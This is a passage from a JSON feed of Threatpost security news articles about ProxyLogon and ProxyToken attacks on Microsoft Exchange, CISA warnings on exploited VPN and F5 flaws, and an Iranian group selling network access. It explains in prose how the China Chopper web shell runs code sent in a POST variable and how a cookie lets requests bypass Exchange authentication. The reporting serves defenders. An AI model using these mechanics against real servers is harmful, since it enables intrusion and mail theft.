hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identify them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. Organizations should update their products to avoid 